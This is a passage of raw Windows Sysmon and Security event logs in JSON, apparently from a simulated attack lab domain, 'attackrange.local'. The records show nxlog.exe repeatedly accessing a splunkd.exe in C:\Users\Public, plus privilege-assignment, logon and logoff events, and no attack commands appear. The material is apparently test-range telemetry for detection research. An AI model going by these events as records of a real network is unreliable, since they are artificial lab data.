(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:24.495","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:25.496\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:25.496","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:26.496\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:26.496","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:27.496\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:27.496","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:28.497\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:28.497","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220401,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x62B69\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x62b69","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220402,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x62B69\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52611\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x62b69","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52611","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220403,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x62B69\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x62b69","LogonType":"3","EventReceivedTime":"2020-08-01 06:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:29.497\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 